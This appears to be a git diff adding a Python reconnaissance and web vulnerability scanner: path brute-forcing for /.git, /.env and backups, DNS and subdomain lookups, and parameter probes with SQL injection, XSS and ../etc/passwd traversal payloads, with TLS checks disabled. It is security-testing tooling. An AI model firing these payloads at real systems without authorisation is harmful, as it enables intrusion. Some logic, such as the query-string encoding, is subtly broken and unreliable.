||||||
|
hosts[current_ip]["open_ports"].append({
|
||||||
|
"port": int(port_match.group(1)),
|
||||||
|
"service": port_match.group(2),
|
||||||
|
"version": "unknown"
|
||||||
|
})
|
||||||
|
|
||||||
|
return hosts
|
||||||
|
|
||||||
|
def _parse_vuln_output(self, output: str) -> List[Dict]:
|
||||||
|
"""Parse vulnerability scan output"""
|
||||||
|
vulnerabilities = []
|
||||||
|
|
||||||
|
# Extract CVEs and vulnerability info
|
||||||
|
cve_pattern = r'(CVE-\d{4}-\d+)'
|
||||||
|
for match in re.finditer(cve_pattern, output):
|
||||||
|
vulnerabilities.append({
|
||||||
|
"cve": match.group(1),
|
||||||
|
"severity": "unknown"
|
||||||
|
})
|
||||||
|
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
def _generate_summary(self, hosts: Dict) -> Dict:
|
||||||
|
"""Generate scan summary"""
|
||||||
|
total_hosts = len(hosts)
|
||||||
|
total_ports = sum(len(h.get("open_ports", [])) for h in hosts.values())
|
||||||
|
services = set()
|
||||||
|
|
||||||
|
for host in hosts.values():
|
||||||
|
for port in host.get("open_ports", []):
|
||||||
|
services.add(port.get("service"))
|
||||||
|
|
||||||
|
return {
|
||||||
|
"total_hosts": total_hosts,
|
||||||
|
"total_open_ports": total_ports,
|
||||||
|
"unique_services": list(services)
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
class WebRecon:
|
||||||
|
"""Web application reconnaissance"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def analyze(self, url: str) -> Dict:
|
||||||
|
"""Analyze web application"""
|
||||||
|
logger.info(f"Analyzing web application: {url}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"url": url,
|
||||||
|
"technologies": [],
|
||||||
|
"headers": {},
|
||||||
|
"security_headers": {},
|
||||||
|
"endpoints": [],
|
||||||
|
"forms": [],
|
||||||
|
"vulnerabilities": []
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Technology detection
|
||||||
|
results["technologies"] = self._detect_technologies(url)
|
||||||
|
|
||||||
|
# Header analysis
|
||||||
|
results["headers"], results["security_headers"] = self._analyze_headers(url)
|
||||||
|
|
||||||
|
# Endpoint discovery
|
||||||
|
results["endpoints"] = self._discover_endpoints(url)
|
||||||
|
|
||||||
|
# Form detection
|
||||||
|
results["forms"] = self._detect_forms(url)
|
||||||
|
|
||||||
|
# Quick vulnerability checks
|
||||||
|
results["vulnerabilities"] = self._check_vulnerabilities(url)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Web recon error: {e}")
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _detect_technologies(self, url: str) -> List[str]:
|
||||||
|
"""Detect web technologies"""
|
||||||
|
technologies = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = requests.get(url, timeout=10, verify=False)
|
||||||
|
|
||||||
|
# Check headers for technology indicators
|
||||||
|
server = response.headers.get('Server', '')
|
||||||
|
if server:
|
||||||
|
technologies.append(f"Server: {server}")
|
||||||
|
|
||||||
|
x_powered_by = response.headers.get('X-Powered-By', '')
|
||||||
|
if x_powered_by:
|
||||||
|
technologies.append(f"X-Powered-By: {x_powered_by}")
|
||||||
|
|
||||||
|
# Check content for framework indicators
|
||||||
|
content = response.text.lower()
|
||||||
|
if 'wordpress' in content:
|
||||||
|
technologies.append("WordPress")
|
||||||
|
if 'joomla' in content:
|
||||||
|
technologies.append("Joomla")
|
||||||
|
if 'drupal' in content:
|
||||||
|
technologies.append("Drupal")
|
||||||
|
if 'django' in content:
|
||||||
|
technologies.append("Django")
|
||||||
|
if 'laravel' in content:
|
||||||
|
technologies.append("Laravel")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Technology detection error: {e}")
|
||||||
|
|
||||||
|
return technologies
|
||||||
|
|
||||||
|
def _analyze_headers(self, url: str) -> tuple:
|
||||||
|
"""Analyze HTTP headers"""
|
||||||
|
headers = {}
|
||||||
|
security_headers = {}
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = requests.head(url, timeout=10, verify=False)
|
||||||
|
headers = dict(response.headers)
|
||||||
|
|
||||||
|
# Check for security headers
|
||||||
|
security_checks = [
|
||||||
|
'X-Frame-Options',
|
||||||
|
'X-Content-Type-Options',
|
||||||
|
'Strict-Transport-Security',
|
||||||
|
'Content-Security-Policy',
|
||||||
|
'X-XSS-Protection'
|
||||||
|
]
|
||||||
|
|
||||||
|
for header in security_checks:
|
||||||
|
if header in headers:
|
||||||
|
security_headers[header] = headers[header]
|
||||||
|
else:
|
||||||
|
security_headers[header] = "Missing"
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Header analysis error: {e}")
|
||||||
|
|
||||||
|
return headers, security_headers
|
||||||
|
|
||||||
|
def _discover_endpoints(self, url: str) -> List[str]:
|
||||||
|
"""Discover endpoints using common paths"""
|
||||||
|
endpoints = []
|
||||||
|
common_paths = [
|
||||||
|
'/admin', '/login', '/api', '/config', '/backup',
|
||||||
|
'/admin.php', '/phpinfo.php', '/info.php',
|
||||||
|
'/robots.txt', '/sitemap.xml', '/.git', '/.env'
|
||||||
|
]
|
||||||
|
|
||||||
|
parsed = urlparse(url)
|
||||||
|
base_url = f"{parsed.scheme}://{parsed.netloc}"
|
||||||
|
|
||||||
|
for path in common_paths:
|
||||||
|
try:
|
||||||
|
response = requests.head(
|
||||||
|
f"{base_url}{path}",
|
||||||
|
timeout=5,
|
||||||
|
verify=False,
|
||||||
|
allow_redirects=False
|
||||||
|
)
|
||||||
|
|
||||||
|
if response.status_code < 400:
|
||||||
|
endpoints.append(path)
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return endpoints
|
||||||
|
|
||||||
|
def _detect_forms(self, url: str) -> List[Dict]:
|
||||||
|
"""Detect forms on webpage"""
|
||||||
|
forms = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = requests.get(url, timeout=10, verify=False)
|
||||||
|
|
||||||
|
# Simple form detection
|
||||||
|
form_pattern = r'<form[^>]*>(.*?)</form>'
|
||||||
|
for match in re.finditer(form_pattern, response.text, re.DOTALL):
|
||||||
|
forms.append({
|
||||||
|
"action": re.search(r'action=["\']([^"\']+)["\']', match.group(0)),
|
||||||
|
"method": re.search(r'method=["\']([^"\']+)["\']', match.group(0))
|
||||||
|
})
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Form detection error: {e}")
|
||||||
|
|
||||||
|
return forms
|
||||||
|
|
||||||
|
def _check_vulnerabilities(self, url: str) -> List[str]:
|
||||||
|
"""Quick vulnerability checks"""
|
||||||
|
vulnerabilities = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
# SQL Injection test
|
||||||
|
test_url = f"{url}?id=1'"
|
||||||
|
response = requests.get(test_url, timeout=10, verify=False)
|
||||||
|
if 'sql' in response.text.lower() or 'mysql' in response.text.lower():
|
||||||
|
vulnerabilities.append("Potential SQL Injection")
|
||||||
|
|
||||||
|
# XSS test
|
||||||
|
test_url = f"{url}?q=<script>alert(1)</script>"
|
||||||
|
response = requests.get(test_url, timeout=10, verify=False)
|
||||||
|
if '<script>alert(1)</script>' in response.text:
|
||||||
|
vulnerabilities.append("Potential XSS")
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Vulnerability check error: {e}")
|
||||||
|
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
class OSINTCollector:
|
||||||
|
"""Open Source Intelligence collection"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def collect(self, target: str) -> Dict:
|
||||||
|
"""Collect OSINT data"""
|
||||||
|
logger.info(f"Collecting OSINT for: {target}")
|
||||||
|
|
||||||
|
return {
|
||||||
|
"target": target,
|
||||||
|
"emails": self._find_emails(target),
|
||||||
|
"social_media": self._find_social_media(target),
|
||||||
|
"data_breaches": self._check_breaches(target),
|
||||||
|
"metadata": self._collect_metadata(target)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _find_emails(self, target: str) -> List[str]:
|
||||||
|
"""Find email addresses"""
|
||||||
|
# Placeholder - would use theHarvester or similar
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _find_social_media(self, target: str) -> Dict:
|
||||||
|
"""Find social media profiles"""
|
||||||
|
return {}
|
||||||
|
|
||||||
|
def _check_breaches(self, target: str) -> List[str]:
|
||||||
|
"""Check for data breaches"""
|
||||||
|
return []
|
||||||
|
|
||||||
|
def _collect_metadata(self, target: str) -> Dict:
|
||||||
|
"""Collect metadata"""
|
||||||
|
return {}
|
||||||
|
|
||||||
|
|
||||||
|
class DNSEnumerator:
|
||||||
|
"""DNS enumeration"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def enumerate(self, domain: str) -> Dict:
|
||||||
|
"""Enumerate DNS records"""
|
||||||
|
logger.info(f"Enumerating DNS for: {domain}")
|
||||||
|
|
||||||
|
records = {
|
||||||
|
"domain": domain,
|
||||||
|
"A": [],
|
||||||
|
"AAAA": [],
|
||||||
|
"MX": [],
|
||||||
|
"NS": [],
|
||||||
|
"TXT": [],
|
||||||
|
"SOA": []
|
||||||
|
}
|
||||||
|
|
||||||
|
record_types = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'SOA']
|
||||||
|
|
||||||
|
for rtype in record_types:
|
||||||
|
try:
|
||||||
|
answers = dns.resolver.resolve(domain, rtype)
|
||||||
|
records[rtype] = [str(rdata) for rdata in answers]
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return records
|
||||||
|
|
||||||
|
|
||||||
|
class SubdomainFinder:
|
||||||
|
"""Subdomain discovery"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def find(self, domain: str) -> List[str]:
|
||||||
|
"""Find subdomains"""
|
||||||
|
logger.info(f"Finding subdomains for: {domain}")
|
||||||
|
|
||||||
|
subdomains = []
|
||||||
|
common_subdomains = [
|
||||||
|
'www', 'mail', 'ftp', 'admin', 'test', 'dev',
|
||||||
|
'staging', 'api', 'blog', 'shop', 'portal'
|
||||||
|
]
|
||||||
|
|
||||||
|
for sub in common_subdomains:
|
||||||
|
subdomain = f"{sub}.{domain}"
|
||||||
|
try:
|
||||||
|
socket.gethostbyname(subdomain)
|
||||||
|
subdomains.append(subdomain)
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return subdomains
|
||||||
39
tools/recon/subdomain_finder.py
Normal file
39
tools/recon/subdomain_finder.py
Normal file
@@ -0,0 +1,39 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
SubdomainFinder - A placeholder for a subdomain discovery tool.
|
||||||
|
"""
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class SubdomainFinder:
|
||||||
|
"""
|
||||||
|
A class for finding subdomains of a given domain.
|
||||||
|
This is a placeholder and should be expanded.
|
||||||
|
"""
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""
|
||||||
|
Initializes the SubdomainFinder.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
config (Dict): The configuration dictionary for the framework.
|
||||||
|
"""
|
||||||
|
self.config = config
|
||||||
|
logger.info("SubdomainFinder initialized (placeholder)")
|
||||||
|
|
||||||
|
def find(self, target: str) -> List[str]:
|
||||||
|
"""
|
||||||
|
Finds subdomains for a given domain.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target (str): The domain name to search subdomains for.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
List[str]: A list of found subdomains.
|
||||||
|
"""
|
||||||
|
logger.warning(f"Subdomain finding for {target} is a placeholder. Returning empty data.")
|
||||||
|
# Placeholder: In a real implementation, this would use techniques like
|
||||||
|
# querying Certificate Transparency logs, using search engines, or
|
||||||
|
# brute-forcing with a wordlist.
|
||||||
|
return []
|
||||||
1
tools/web_pentest/__init__.py
Normal file
1
tools/web_pentest/__init__.py
Normal file
@@ -0,0 +1 @@
|
|||||||
|
from .web_recon import WebRecon
|
||||||
185
tools/web_pentest/web_recon.py
Normal file
185
tools/web_pentest/web_recon.py
Normal file
@@ -0,0 +1,185 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
WebRecon - A tool for web reconnaissance and basic vulnerability scanning.
|
||||||
|
"""
|
||||||
|
import requests
|
||||||
|
import logging
|
||||||
|
from typing import Dict, List
|
||||||
|
from urllib.parse import urljoin, urlencode # Added urlencode
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
class WebRecon:
|
||||||
|
"""
|
||||||
|
A class for performing basic web reconnaissance and simple vulnerability checks.
|
||||||
|
"""
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""
|
||||||
|
Initializes the WebRecon tool.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
config (Dict): The configuration dictionary for the framework.
|
||||||
|
"""
|
||||||
|
self.config = config
|
||||||
|
# Expanded wordlist for discovering common paths
|
||||||
|
self.wordlist = [
|
||||||
|
"admin", "login", "dashboard", "api", "robots.txt", "sitemap.xml",
|
||||||
|
"test", "dev", "backup", "v1", "v2", "v3", ".git", ".env", "config.php",
|
||||||
|
"phpinfo.php", "index.php", "main.php", "home.php", "portal.php",
|
||||||
|
"upload", "files", "images", "assets", "downloads", "includes",
|
||||||
|
"src", "backup.zip", "data.sql", "admin.bak", "panel"
|
||||||
|
]
|
||||||
|
self.headers = {
|
||||||
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
|
||||||
|
}
|
||||||
|
self.test_parameters = ["id", "page", "cat", "item", "view", "name", "query", "search"] # Added for vulnerability testing
|
||||||
|
|
||||||
|
def analyze(self, target: str) -> Dict:
|
||||||
|
"""
|
||||||
|
Analyzes a web target to find common directories, files, and basic vulnerabilities.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
target (str): The base URL to analyze. It should include the scheme (http/https).
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Dict: A dictionary containing the findings including discovered paths and vulnerabilities.
|
||||||
|
"""
|
||||||
|
logger.info(f"Starting web reconnaissance and basic vulnerability scan on {target}")
|
||||||
|
findings = {
|
||||||
|
"target": target,
|
||||||
|
"status_code": None,
|
||||||
|
"headers": {},
|
||||||
|
"discovered_paths": [],
|
||||||
|
"vulnerabilities": [] # New key for vulnerabilities
|
||||||
|
}
|
||||||
|
|
||||||
|
if not target.startswith(('http://', 'https://')):
|
||||||
|
target = f"http://{target}"
|
||||||
|
logger.info(f"No scheme provided. Defaulting to http: {target}")
|
||||||
|
|
||||||
|
# 1. Check base URL connectivity and headers
|
||||||
|
try:
|
||||||
|
response = requests.head(target, headers=self.headers, timeout=5, allow_redirects=True)
|
||||||
|
findings["status_code"] = response.status_code
|
||||||
|
findings["headers"] = dict(response.headers)
|
||||||
|
logger.info(f"Target {target} is online. Status: {response.status_code}")
|
||||||
|
except requests.RequestException as e:
|
||||||
|
logger.error(f"Failed to connect to {target}: {e}")
|
||||||
|
return {"error": f"Failed to connect to target: {e}"}
|
||||||
|
|
||||||
|
# 2. Discover common paths
|
||||||
|
for path in self.wordlist:
|
||||||
|
url_to_check = urljoin(target, path)
|
||||||
|
try:
|
||||||
|
res = requests.get(url_to_check, headers=self.headers, timeout=3, allow_redirects=False)
|
||||||
|
if res.status_code >= 200 and res.status_code < 400:
|
||||||
|
logger.info(f"Found path: {url_to_check} (Status: {res.status_code})")
|
||||||
|
findings["discovered_paths"].append({
|
||||||
|
"path": url_to_check,
|
||||||
|
"status_code": res.status_code
|
||||||
|
})
|
||||||
|
except requests.RequestException:
|
||||||
|
# Ignore connection errors for sub-paths
|
||||||
|
continue
|
||||||
|
|
||||||
|
# 3. Perform basic vulnerability checks
|
||||||
|
logger.info(f"Performing basic vulnerability checks on {target}")
|
||||||
|
findings["vulnerabilities"].extend(self._check_sqli(target))
|
||||||
|
findings["vulnerabilities"].extend(self._check_xss(target))
|
||||||
|
findings["vulnerabilities"].extend(self._check_lfi(target))
|
||||||
|
|
||||||
|
logger.info(f"Web reconnaissance on {target} finished. Found {len(findings['discovered_paths'])} paths and {len(findings['vulnerabilities'])} vulnerabilities.")
|
||||||
|
return findings
|
||||||
|
|
||||||
|
def _check_sqli(self, target: str) -> List[Dict]:
|
||||||
|
"""Checks for basic SQL Injection vulnerabilities."""
|
||||||
|
vulnerabilities = []
|
||||||
|
sqli_payloads = ["'", " or 1=1-- -", " or 1=1#", "\" or 1=1-- -"]
|
||||||
|
sqli_error_patterns = ["sql syntax", "mysql_fetch_array()", "error in your sql syntax", "warning: mysql", "unclosed quotation mark"]
|
||||||
|
|
||||||
|
for param in self.test_parameters:
|
||||||
|
for payload in sqli_payloads:
|
||||||
|
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||||
|
try:
|
||||||
|
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||||
|
for error_pattern in sqli_error_patterns:
|
||||||
|
if error_pattern in response.text.lower():
|
||||||
|
vulnerabilities.append({
|
||||||
|
"type": "SQL Injection",
|
||||||
|
"severity": "High",
|
||||||
|
"url": test_url,
|
||||||
|
"parameter": param,
|
||||||
|
"payload": payload,
|
||||||
|
"response_snippet": response.text[:200],
|
||||||
|
"description": f"Potential SQL Injection via parameter '{param}' with payload '{payload}'"
|
||||||
|
})
|
||||||
|
logger.warning(f"Potential SQLi found: {test_url}")
|
||||||
|
# Stop after first finding for this param/type
|
||||||
|
break
|
||||||
|
except requests.RequestException:
|
||||||
|
continue
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
def _check_xss(self, target: str) -> List[Dict]:
|
||||||
|
"""Checks for basic Cross-Site Scripting (XSS) vulnerabilities."""
|
||||||
|
vulnerabilities = []
|
||||||
|
xss_payloads = [
|
||||||
|
"<script>alert(1)</script>",
|
||||||
|
"<img src=x onerror=alert(1)>",
|
||||||
|
"<svg onload=alert(1)>"
|
||||||
|
]
|
||||||
|
|
||||||
|
for param in self.test_parameters:
|
||||||
|
for payload in xss_payloads:
|
||||||
|
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||||
|
try:
|
||||||
|
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||||
|
if payload.replace('alert(1)', 'alert(1)') in response.text or \
|
||||||
|
payload in response.text: # Check for reflected payload
|
||||||
|
vulnerabilities.append({
|
||||||
|
"type": "Cross-Site Scripting (XSS)",
|
||||||
|
"severity": "Medium",
|
||||||
|
"url": test_url,
|
||||||
|
"parameter": param,
|
||||||
|
"payload": payload,
|
||||||
|
"response_snippet": response.text[:200],
|
||||||
|
"description": f"Potential XSS via parameter '{param}' with payload '{payload}'"
|
||||||
|
})
|
||||||
|
logger.warning(f"Potential XSS found: {test_url}")
|
||||||
|
# Stop after first finding for this param/type
|
||||||
|
break
|
||||||
|
except requests.RequestException:
|
||||||
|
continue
|
||||||
|
return vulnerabilities
|
||||||
|
|
||||||
|
def _check_lfi(self, target: str) -> List[Dict]:
|
||||||
|
"""Checks for basic Local File Inclusion (LFI) vulnerabilities."""
|
||||||
|
vulnerabilities = []
|
||||||
|
lfi_payloads = [
|
||||||
|
"../../../../etc/passwd",
|
||||||
|
"....//....//....//etc/passwd",
|
||||||
|
"%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" # URL-encoded
|
||||||
|
]
|
||||||
|
lfi_patterns = ["root:x:", "daemon:x:", "bin:x:"] # Common patterns in /etc/passwd
|
||||||
|
|
||||||
|
for param in self.test_parameters:
|
||||||
|
for payload in lfi_payloads:
|
||||||
|
test_url = f"{target}?{param}={urlencode({'': payload})}"
|
||||||
|
try:
|
||||||
|
response = requests.get(test_url, headers=self.headers, timeout=5)
|
||||||
|
if any(pattern in response.text for pattern in lfi_patterns):
|
||||||
|
vulnerabilities.append({
|
||||||
|
"type": "Local File Inclusion (LFI)",
|
||||||
|
"severity": "High",
|
||||||
|
"url": test_url,
|
||||||
|
"parameter": param,
|
||||||
|
"payload": payload,
|
||||||
|
"response_snippet": response.text[:200],
|
||||||
|
"description": f"Potential LFI via parameter '{param}' with payload '{payload}'"
|
||||||
|
})
|
||||||
|
logger.warning(f"Potential LFI found: {test_url}")
|
||||||
|
# Stop after first finding for this param/type
|
||||||
|
break
|
||||||
|
except requests.RequestException:
|
||||||
|
continue
|
||||||
|
return vulnerabilities
|
||||||
Reference in New Issue
Block a user